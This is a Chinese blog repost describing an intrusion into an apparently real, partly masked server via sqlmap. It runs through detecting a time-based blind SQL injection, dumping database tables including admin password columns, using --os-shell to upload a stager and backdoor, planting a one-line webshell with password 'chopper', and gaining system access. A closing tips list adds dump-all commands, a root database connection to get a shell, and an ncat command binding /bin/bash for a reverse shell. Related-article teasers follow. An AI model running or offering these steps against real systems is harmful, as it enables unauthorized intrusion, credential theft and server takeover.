mysql sqlmap注入_使用sqlmap进行MySQL注入并渗透某服务器

最新推荐文章于 2023-12-04 20:50:11 发布
最新推荐文章于 2023-12-04 20:50:11 发布
阅读量797 收藏 1
点赞数
文章标签: mysql sqlmap注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42511517/article/details/114762036
版权
本文详述了如何利用sqlmap工具检测SQL注入点,然后逐步获取数据库信息、数据库表、数据,甚至通过时间盲注获取webshell,最终达到控制服务器的目的。涉及的技术包括时间盲注、数据库信息获取、表和数据提取、webshell获取等。
摘要由CSDN通过智能技术生成

本文作者:simeon

本文属于安全脉搏原创金币奖励计划文章,

sqlmap功能强大,在某些情况下,通过SQL注入可以直接获取webshell权限,甚至可以获取Windows或者Linux服务器权限。下面以一个实际案例来介绍如何获取服务器权限。

1、检测SQL注入点

SQL注入点可以通过扫描软件扫描,手工测试以及读取代码来判断,一旦发现存在SQL注入,可以直接进行检测,如图1所示,执行:

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263

可以获取信息:

web server operating system: Windows

web application technology: PHP 5.4.34, Apache 2.4.10

back-end DBMS: MySQL >= 5.0.12

通过提示信息可以知道该SQL注入点是基于时间的盲注。

81c256f9a8388846028e4da5b6598663.png 图1检测当前SQL注入点是否可用

2、获取当前数据库信息

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 --current-db

获取当前数据库为“Sshgdsys”,如图2所示。

3e4e30e0e047e3c638c7ef86f0d69756.png 图2获取当前数据库

3、获取当前数据库表

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys --tables

基于时间注入:

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '—time-sec')? [Y/n] y

24f66e984ac9ae272165be7de4fcd262.png 图3获取数据库中的表

4、获取admins表列和数据

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins --columns

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins -C id,adminpass ,adminname —dump

5、获取webshell

(1)获取网站信息

能够获取webshell的前提是能够确定网站的真实路径以及目录权限可以写入。通常使用—os-shell参数来获取。执行命令:

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 --os-shell

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

选择web应用程序类型,选择4,开始获取网站的根目录,存在漏洞所在程序的路径,效果如图4所示。

[10:18:46] [INFO] retrieved the web server document root: 'E:xampphtdocs'

[10:18:46] [INFO] retrieved web server absolute paths: 'E:/xampp/htdocs/sshgdsys/fb/modify.php'

[10:18:46] [INFO] trying to upload the file stager on 'E:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[10:18:48] [INFO] heuristics detected web page charset 'utf-8'

[10:18:48] [INFO] the file stager has been successfully uploaded on 'E:/xampp/htdocs/' - http://***.**.**.**:8081/tmpuqioc.php

[10:18:48] [INFO] heuristics detected web page charset 'ascii'

[10:18:48] [INFO] the backdoor has been successfully uploaded on 'E:/xampp/htdocs/' - http://***.**.**.**:8081/tmpbboab.php

[10:18:48] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

0c32f845b887ecbbc87cd7a0c8c2868d.png 图4获取网站真实路径和当前目录

(2)获取webshell

在sqlmap命令提示窗口直接输入:

echo “” >1.php 在当前路径下生成1.php。

获取webshell: http://***.**.**.**:8081/1.php 一句话密码为:chopper

执行命令whomai即可获取系统权限,如图5所示。

2d1f587ec7947f25a1965c15448f43c5.png 图5获取系统权限

6、总结及技巧

(1)自动提交参数和智能进行注入:sqlmap.py -u url –batch –smart

(2)获取所有信息:sqlmap.py -u url –batch –smart -a

(3)导出数据库:sqlmap.py -u url -–dump-all

(4)直接连接数据库:python sqlmap.py -d “mysql://admin:admin@192.168.21.17:3306/testdb” -f –banner –dbs –users,例如root账号直接获取shell:

python sqlmap.py -d “mysql://root:123456@192.168.21.17:3306/mysql” –os-shell

(5)获取webshell: sqlmap.py -u url –os-shell

(6)linux下实现反弹:

ncat -l -p 2333 -e /bin/bash

ncat targetip 2333

注意:本文来自安全脉搏。本站无法对本文内容的真实性、完整性、及时性、原创性提供任何保证,请您自行验证核实并承担相关的风险与后果!

CoLaBug.com遵循[CC BY-SA 4.0]分享并保持客观立场,本站不承担此类作品侵权行为的直接责任及连带责任。您有版权、意见、投诉等问题,请通过[eMail]联系我们处理,如需商业授权请联系原作者/原网站。

蜜桃公主Y
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
有手就行———使用sqlmap工具进行sql注入
maluxiao123的博客
03-31 1502
前面几节基础的sql注入原理就介绍完了,当然这是mysql注入的各种基础方法,还有很多高阶的注入技巧,做够了手工注入,理解各种注入的原理之后我们就来尝试一下sqlmap一把梭哈带来的快感。 前置条件: 1.安装python 2.下载安装sqlmap https://blog.csdn.net/zhongcui8067/article/details/80439934 cd到sqlmap安装目录查看version成功代表安装成功,由于我是python2和python3的共存环境,所以加了个-2的指令,大家直
sqlmap注入mysql_自定义sqlmap注入语句进行高级注入
weixin_39564151的博客
01-30 307
现在能够帮助我们进行sql注入检测的工具越来越多,但我认为,通用性最强的还是sqlmap,其他工具在灵活性上远远不及sqlmap。sql注入有许多类型,其中最喜欢的当然是能够union查询的,比blind类型的不知道爽到哪里去了。现在有一个url已知存在sql注入漏洞,我们丢到sqlmap里面,跑一下,结果是这样的sqlmap -u "http://www.ooxx.com/ooxx.php?xi...
mysql sqlmap 注入尝试
weixin_30293079的博客
09-29 72
假设注入点为 http://www.abc.com/news.php?id=12 //探测数据库信息 sqlmap -u http://www.abc.com/news.php?id=12 –dbs >db_a >db_b // 选择一个数据库 猜解表名 sqlmap -u http://www.abc.com/news.php?id=12 -D db_b–tables // 猜解表结...
MySQL——查询数据库、数据表总记录数
无限迭代中......
09-25 8516
方法一information_schema information_schema数据库是MySQL系统自带的数据库,它提供了数据库元数据的访问方式。information_schema就记录了数据库当中大部分基本的信息,比如字符集,权限相关,数据库实体对象信息,外检约束,分区,压缩表,表信息,索引信息,参数,优化,锁和事物等等。通过information_schema我们可以窥透整个MySQ...
SQLMAP渗透笔记之MySQL数据库注入
Birdman-one的博客
12-26 1284
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之MySQL数据库注入 --------------------------------------------------------------
SQLMAP注入使用
05-13
sqlmap可以多平台运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入,更重要的是sqlmap是一款开源的工具。 SQLMAP注入命令详解: 1. python SQLMAP.py -u "xxxxxxx.com"【查询链接是否存在...
sql注入攻击之sqlmap
06-10
它支持多种数据库管理系统,如MySQL、PostgreSQL、Oracle等,并提供各种技术来绕过安全措施,如盲注、时间基注入、错误注入等。此外,SQLMap还具有自动化的会话保持和cookie管理功能,使得在多步骤的注入过程中保持...
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
`SQLmap`是一款开源工具,专门用于自动化地发现并利用SQL注入漏洞,进而获取数据库内容乃至服务器权限。本文将重点介绍如何使用`SQLmap`进行Webshell获取以及系统权限升级,通过具体命令和步骤,帮助读者深入理解这...
mysql入侵服务器_记通过mysql数据库成功入侵到服务器内部的渗透实战
weixin_33127399的博客
01-19 1218
1,在成功进入mysql到数据库之后,可以使用select user();命令,查看当前的用户,如果为root,则可以执行下一步操作。不为root,则需要通过其他方法提权。2, 使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况,如果没有开启,则使用下面...
SQL注入部分:DVWA+SQLmap+Mysql注入实战
AZXYZNPY的博客
11-21 686
(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。注意:应当在第一个页面就点检查,而不是点击检查源代码之后再点击检查,然后就能获得cookie值,而且每次实验的值都不一样,因此做实验最好一次做完。7、枚举指定数据表中的所有用户名与密码,并down到本地。--tables:枚举指定数据库的所有表。2、枚举当前使用的数据库名称和用户名。5、枚举数据库和指定数据库的数据表。--dbs:枚举当前数据库。-T:指定数据库中的数据表。
【无标题】【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了
Jason__zhao的博客
02-04 505
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等
SQL注入由简入精(mysql数据库为例)
m0_53727330的博客
07-14 152
快速了解SQL注入
详细|通过mysql学习sql注入
st3pby的博客
06-08 997
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
SQL注入(DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 5950
SQL注入(DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 2548
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
linux mysql udf渗透测试
whatday的专栏
10-29 1090
UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的lib_mysqludf_sys.so_文件,但是测试中发现会报错, mysql> create function sys_eval retu...
sql注入原理及各姿势sqlmap使用
最新发布
m0_63641882的博客
12-04 1432
ps:及后端服务器在收到参数未对参数进行过滤直接带入数据库当中进行查询,这样就导致了参数拼接构造的sql语句进行执行列子:当我们在前端进行页面登录的时候后端代码 输入用户admin和万能密码:2' or '1时后端代码 因为逻辑运算符有优先级之分 or
sqlmap使用详解:自动化SQL注入工具
"sqlmap用户手册提供了全面的指南,涵盖了如何使用这个强大的SQL注入工具进行安全测试。手册详细解释了sqlmap的功能和操作流程,包括它如何检测和利用不同类型的SQL注入漏洞,以及支持的数据库类型。" sqlmap是一款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值